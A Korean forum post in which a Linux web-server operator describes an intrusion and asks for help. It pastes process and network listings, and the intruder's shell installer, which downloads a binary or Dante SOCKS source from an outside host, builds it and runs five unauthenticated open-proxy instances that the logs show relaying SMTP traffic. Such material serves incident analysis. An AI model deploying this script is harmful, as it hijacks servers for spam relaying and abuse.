[해킹피해질문] /usr/include/sdk386/sdk386/s
작성자 정보
- 주용환 작성
- 작성일
컨텐츠 정보
- 1,313 조회
- 0 추천
- 목록
본문
안녕하십니까? 궁금하여 본의아니게 질문을 드려보게 됩니다.
리눅스 시스템으로 웹서버를 운영중인데, 금일 아침 서비스가 제대로 이루어 지지 않아 확인하여 보니 다음과 같은점을 발견하였습니다.
심각한 피해는 없었으나, 해당 서버의 서비스 기능은 상실되네요.
일종의 해킹피해를 받은지라, 해당 내용을 좀 찾아보았는데, 쉽지가 않아 도움을 요청해 보게 됩니다.
# ps -ef
root 25478 1 1 Oct01 ? 01:23:10 ./s -f s01.cfg
root 25480 1 2 Oct01 ? 01:29:50 ./s -f s02.cfg
root 25481 1 2 Oct01 ? 01:34:18 ./s -f s03.cfg
root 25482 1 2 Oct01 ? 01:27:30 ./s -f s04.cfg
root 25483 1 2 Oct01 ? 01:34:13 ./s -f s05.cfg
root 25484 25480 0 Oct01 ? 00:04:58 ./s -f s02.cfg
root 25485 25478 0 Oct01 ? 00:04:56 ./s -f s01.cfg
root 25486 25480 0 Oct01 ? 00:00:06 ./s -f s02.cfg
root 25487 25478 0 Oct01 ? 00:00:05 ./s -f s01.cfg
root 25488 25480 0 Oct01 ? 00:00:06 ./s -f s02.cfg
root 25489 25478 0 Oct01 ? 00:00:06 ./s -f s01.cfg
root 25490 25478 0 Oct01 ? 00:00:05 ./s -f s01.cfg
root 25491 25481 0 Oct01 ? 00:05:03 ./s -f s03.cfg
root 25492 25481 0 Oct01 ? 00:00:06 ./s -f s03.cfg
(생략)
# netstat -an
tcp 0 1 220.73.139.105:49982 216.93.66.110:25 SYN_SENT
tcp 3 0 220.73.139.105:39135 64.127.123.83:51300 ESTABLISHED
tcp 0 1 220.73.139.105:50103 216.93.66.110:25 SYN_SENT
tcp 0 0 220.73.139.105:59980 64.156.215.19:25 ESTABLISHED
tcp 0 0 220.73.139.105:42082 194.7.83.67:25 TIME_WAIT
tcp 0 0 220.73.139.105:44708 209.223.136.74:25 TIME_WAIT
tcp 0 1 220.73.139.105:45848 209.245.216.210:25 SYN_SENT
tcp 0 1 220.73.139.105:57142 16.114.1.31:25 SYN_SENT
tcp 0 0 220.73.139.105:37369 209.68.2.152:25 TIME_WAIT
tcp 0 0 220.73.139.105:15422 64.127.123.83:47298 ESTABLISHED
tcp 0 1 220.73.139.105:41522 15.1.28.240:25 SYN_SENT
tcp 0 0 220.73.139.105:59567 64.156.215.19:25 ESTABLISHED
tcp 0 0 220.73.139.105:35698 200.35.64.88:25 TIME_WAIT
tcp 0 0 220.73.139.105:59622 64.156.215.19:25 ESTABLISHED
tcp 0 0 220.73.139.105:59621 64.156.215.19:25 ESTABLISHED
tcp 0 0 220.73.139.105:43444 213.153.132.4:25 TIME_WAIT
tcp 0 0 220.73.139.105:15422 64.127.123.83:44995 ESTABLISHED
tcp 0 1 220.73.139.105:49197 216.93.66.110:25 SYN_SENT
tcp 0 1 220.73.139.105:38798 12.32.4.2:25 SYN_SENT
(중략)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 10 [ ] DGRAM 772 /dev/log
unix 2 [ ] DGRAM 80291198
unix 2 [ ] DGRAM 80288165
unix 2 [ ] DGRAM 80260717
unix 2 [ ] DGRAM 80255763
unix 2 [ ] DGRAM 80246768
unix 2 [ ] DGRAM 873
unix 2 [ ] DGRAM 820
unix 2 [ ] DGRAM 787
unix 2 [ ] STREAM CONNECTED 480
# lsof -p 25492
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
s 25492 root cwd DIR 8,5 0 913257 /usr/include/sdk386/sdk386 (deleted)
s 25492 root rtd DIR 8,3 4096 2 /
s 25492 root txt REG 8,5 464052 913585 /usr/include/sdk386/sdk386/s (deleted)
s 25492 root mem REG 8,3 485171 480962 /lib/ld-2.2.4.so
s 25492 root mem REG 8,3 261460 480996 /lib/libnss_files-2.2.4.so
s 25492 root mem REG 8,3 85115 480973 /lib/libcrypt-2.2.4.so
s 25492 root mem REG 8,3 65997 480975 /lib/libdl-2.2.4.so
s 25492 root mem REG 8,3 5772268 176355 /lib/i686/libc-2.2.4.so
s 25492 root 0u CHR 3,0 68706 /dev/ttyp0
s 25492 root 1w CHR 1,3 65258 /dev/null
s 25492 root 2u IPv4 86132351 TCP www105.mk.co.kr:15422->64.127.123.83:34664 (CLOSE_WAIT)
s 25492 root 3u IPv4 86132379 TCP www105.mk.co.kr:34664->mc2.bay6.hotmail.com:smtp (SYN_SENT)
s 25492 root 4u REG 8,3 0 210621 /tmp/sockslockXXXXsIsT4y (deleted)
s 25492 root 7u unix 0xd9114500 68943947 socket
s 25492 root 9w FIFO 0,6 68943948 pipe
(생략)
# ls -al /usr/include/sdk386/sdk386
drwxr-xr-x 2 root root 4096 Oct 4 10:02 .
drwxr-xr-x 3 root root 4096 Oct 4 09:56 ..
-rwxr-xr-x 1 root root 8180 Oct 4 09:56 c
-rwxr-xr-x 1 root root 464052 Oct 4 09:56 s
-rw-r--r-- 1 root root 342 Oct 4 09:56 s01.cfg
-rw-r--r-- 1 root root 342 Oct 4 09:56 s02.cfg
-rw-r--r-- 1 root root 342 Oct 4 09:56 s03.cfg
-rw-r--r-- 1 root root 342 Oct 4 09:56 s04.cfg
-rw-r--r-- 1 root root 342 Oct 4 09:56 s05.cfg
# cat c
#!/bin/sh
return=0
server=220.73.139.105
insthost=xxx
path=/usr/include/sdk386
pathadd=sdk386
exec=s
ip01=220.73.139.105
ip02=220.73.139.105
ip03=220.73.139.105
ip04=220.73.139.105
ip05=220.73.139.105
config01=s01.cfg
config02=s02.cfg
config03=s03.cfg
config04=s04.cfg
config05=s05.cfg
port01=34976
port02=41302
port03=15422
port04=39135
port05=27236
cline01="logoutput: stdout"
c01line02="internal: $server port = $port01"
c02line02="internal: $server port = $port02"
c03line02="internal: $server port = $port03"
c04line02="internal: $server port = $port04"
c05line02="internal: $server port = $port05"
c01line03="external: $ip01"
c02line03="external: $ip02"
c03line03="external: $ip03"
c04line03="external: $ip04"
c05line03="external: $ip05"
cline04="method: none"
cline05="client pass {"
cline06rule01="from: 64.127.123.0/24 to: 0.0.0.0/0"
cline06rule02="from: 83.69.191.0/24 to: 0.0.0.0/0"
cline06rule03="from: 67.18.251.96/27 to: 0.0.0.0/0"
cline06rule04="from: 207.150.169.96/28 to: 0.0.0.0/0"
cline07="}"
cline08="pass {"
cline09rule01="from: 0.0.0.0/0 to: 0.0.0.0/0"
cline10="}"
path () {
cd $path/$pathadd
}
sinstex () {
$path/sk p 0
killall -9 $exec
$path/sk p 1
rm -f $path/$pathadd/$exec
wget http://$insthost/software/$exec
chmod +x $exec
}
sinstbin () {
$path/sk p 0
killall -9 $exec
$path/sk p 1
rm -f $path/$pathadd/$exec
wget http://$insthost/software/dante-1.1.14.tar.gz
tar -zxf dante-1.1.14.tar.gz
cd dante-1.1.14
./configure
make
mv sockd/sockd ../$exec
cd ..
rm -rf dante-1.1.14 dante-1.1.14.tar.gz
chmod +x $exec
}
srem () {
$path/sk p 0
killall -9 $exec
$path/sk p 1
rm -f $path/$pathadd/$exec
}
cinst () {
echo $cline01 > $config01
echo $cline01 > $config02
echo $cline01 > $config03
echo $cline01 > $config04
echo $cline01 > $config05
echo $c01line02 >> $config01
echo $c02line02 >> $config02
echo $c03line02 >> $config03
echo $c04line02 >> $config04
echo $c05line02 >> $config05
echo $c01line03 >> $config01
echo $c02line03 >> $config02
echo $c03line03 >> $config03
echo $c04line03 >> $config04
echo $c05line03 >> $config05
echo $cline04 >> $config01
echo $cline04 >> $config02
echo $cline04 >> $config02
echo $cline04 >> $config03
echo $cline04 >> $config04
echo $cline04 >> $config05
echo $cline05 >> $config01
echo $cline05 >> $config02
echo $cline05 >> $config03
echo $cline05 >> $config04
echo $cline05 >> $config05
echo $cline06rule01 >> $config01
echo $cline06rule01 >> $config02
echo $cline06rule01 >> $config03
echo $cline06rule01 >> $config04
echo $cline06rule01 >> $config05
echo $cline07 >> $config01
echo $cline07 >> $config02
echo $cline07 >> $config03
echo $cline07 >> $config04
echo $cline07 >> $config05
echo $cline05 >> $config01
echo $cline05 >> $config02
echo $cline05 >> $config03
echo $cline05 >> $config04
echo $cline05 >> $config05
echo $cline06rule02 >> $config01
echo $cline06rule02 >> $config02
echo $cline06rule02 >> $config03
echo $cline06rule02 >> $config04
echo $cline06rule02 >> $config05
echo $cline07 >> $config01
echo $cline07 >> $config02
echo $cline07 >> $config03
echo $cline07 >> $config04
echo $cline07 >> $config05
echo $cline05 >> $config01
echo $cline05 >> $config02
echo $cline05 >> $config03
echo $cline05 >> $config04
echo $cline05 >> $config05
echo $cline06rule03 >> $config01
echo $cline06rule03 >> $config02
echo $cline06rule03 >> $config03
echo $cline06rule03 >> $config04
echo $cline06rule03 >> $config05
echo $cline07 >> $config01
echo $cline07 >> $config02
echo $cline07 >> $config03
echo $cline07 >> $config04
echo $cline07 >> $config05
echo $cline05 >> $config01
echo $cline05 >> $config02
echo $cline05 >> $config03
echo $cline05 >> $config03
echo $cline05 >> $config04
echo $cline05 >> $config05
echo $cline06rule04 >> $config01
echo $cline06rule04 >> $config02
echo $cline06rule04 >> $config03
echo $cline06rule04 >> $config04
echo $cline06rule04 >> $config05
echo $cline07 >> $config01
echo $cline07 >> $config02
echo $cline07 >> $config03
echo $cline07 >> $config04
echo $cline07 >> $config05
echo $cline08 >> $config01
echo $cline08 >> $config02
echo $cline08 >> $config03
echo $cline08 >> $config04
echo $cline08 >> $config05
echo $cline09rule01 >> $config01
echo $cline09rule01 >> $config02
echo $cline09rule01 >> $config03
echo $cline09rule01 >> $config04
echo $cline09rule01 >> $config05
echo $cline10 >> $config01
echo $cline10 >> $config02
echo $cline10 >> $config03
echo $cline10 >> $config04
echo $cline10 >> $config05
chmod 644 $config01 $config02 $config03 $config04 $config05
}
cupd () {
$path/sk p 0
killall -9 $exec
$path/sk p 1
rm -f $config01 $config02 $config03 $config04 $config05
echo $cline01 > $config01
echo $cline01 > $config02
echo $cline01 > $config03
echo $cline01 > $config04
echo $cline01 > $config05
echo $c01line02 >> $config01
echo $c02line02 >> $config02
echo $c03line02 >> $config03
echo $c04line02 >> $config04
echo $c05line02 >> $config05
echo $c01line03 >> $config01
echo $c02line03 >> $config02
echo $c03line03 >> $config03
echo $c04line03 >> $config04
echo $c05line03 >> $config05
echo $cline04 >> $config01
echo $cline04 >> $config01
echo $cline04 >> $config02
echo $cline04 >> $config03
echo $cline04 >> $config04
echo $cline04 >> $config05
echo $cline05 >> $config01
echo $cline05 >> $config02
echo $cline05 >> $config03
echo $cline05 >> $config04
echo $cline05 >> $config05
echo $cline06rule01 >> $config01
echo $cline06rule01 >> $config02
echo $cline06rule01 >> $config03
echo $cline06rule01 >> $config04
echo $cline06rule01 >> $config05
echo $cline07 >> $config01
echo $cline07 >> $config02
echo $cline07 >> $config03
echo $cline07 >> $config04
echo $cline07 >> $config05
echo $cline05 >> $config01
echo $cline05 >> $config02
echo $cline05 >> $config03
echo $cline05 >> $config04
echo $cline05 >> $config05
echo $cline06rule02 >> $config01
echo $cline06rule02 >> $config02
echo $cline06rule02 >> $config03
echo $cline06rule02 >> $config04
echo $cline06rule02 >> $config05
echo $cline07 >> $config01
echo $cline07 >> $config02
echo $cline07 >> $config03
echo $cline07 >> $config04
echo $cline07 >> $config05
echo $cline05 >> $config01
echo $cline05 >> $config02
echo $cline05 >> $config03
echo $cline05 >> $config04
echo $cline05 >> $config05
echo $cline06rule03 >> $config01
echo $cline06rule03 >> $config02
echo $cline06rule03 >> $config03
echo $cline06rule03 >> $config04
echo $cline06rule03 >> $config05
echo $cline07 >> $config01
echo $cline07 >> $config02
echo $cline07 >> $config03
echo $cline07 >> $config04
echo $cline07 >> $config05
echo $cline05 >> $config01
echo $cline05 >> $config02
echo $cline05 >> $config02
echo $cline05 >> $config03
echo $cline05 >> $config04
echo $cline05 >> $config05
echo $cline06rule04 >> $config01
echo $cline06rule04 >> $config02
echo $cline06rule04 >> $config03
echo $cline06rule04 >> $config04
echo $cline06rule04 >> $config05
echo $cline07 >> $config01
echo $cline07 >> $config02
echo $cline07 >> $config03
echo $cline07 >> $config04
echo $cline07 >> $config05
echo $cline08 >> $config01
echo $cline08 >> $config02
echo $cline08 >> $config03
echo $cline08 >> $config04
echo $cline08 >> $config05
echo $cline09rule01 >> $config01
echo $cline09rule01 >> $config02
echo $cline09rule01 >> $config03
echo $cline09rule01 >> $config04
echo $cline09rule01 >> $config05
echo $cline10 >> $config01
echo $cline10 >> $config02
echo $cline10 >> $config03
echo $cline10 >> $config04
echo $cline10 >> $config05
chmod 644 $config01 $config02 $config03 $config04 $config05
}
crem () {
$path/sk p 0
killall -9 $exec
$path/sk p 1
rm -f $config01 $config02 $config03 $config04 $config05
}
start () {
$path/sk p 0
killall -9 $exec
$path/sk p 1
./$exec -f $config01 > /dev/null&
./$exec -f $config02 > /dev/null&
./$exec -f $config03 > /dev/null&
./$exec -f $config04 > /dev/null&
./$exec -f $config05 > /dev/null&
}
stop () {
$path/sk p 0
killall -9 $exec
$path/sk p 1
}
case "$1" in start)
path
start
echo service started
;;
stop)
path
stop
echo service stoped
;;
sinstex)
path
sinstex
echo service installed
;;
sinstbin)
path
sinstbin
echo service installed
;;
srem)
path
srem
echo service removed
;;
crem)
path
crem
echo config removed
;;
cupd)
path
cupd
echo config updated
;;
cinst)
path
cinst
echo config installed
;;
*)
echo $"Usage: {sinstex|sinstbin|srem|cinst|crem|cupd|start|stop}"
exit 1
esac
exit $return
# cat s01.cfg
logoutput: stdout
internal: 220.73.139.105 port = 34976
external: 220.73.139.105
method: none
client pass {
from: 64.127.123.0/24 to: 0.0.0.0/0
}
client pass {
from: 83.69.191.0/24 to: 0.0.0.0/0
}
client pass {
from: 67.18.251.96/27 to: 0.0.0.0/0
}
client pass {
from: 207.150.169.96/28 to: 0.0.0.0/0
}
pass {
from: 0.0.0.0/0 to: 0.0.0.0/0
}
혹시 이 내용에 대해 아시는점이 있으신지 조언을 구하고자 합니다.
미리 감사의 말씀을 드립니다.
관련자료
-
이전
-
다음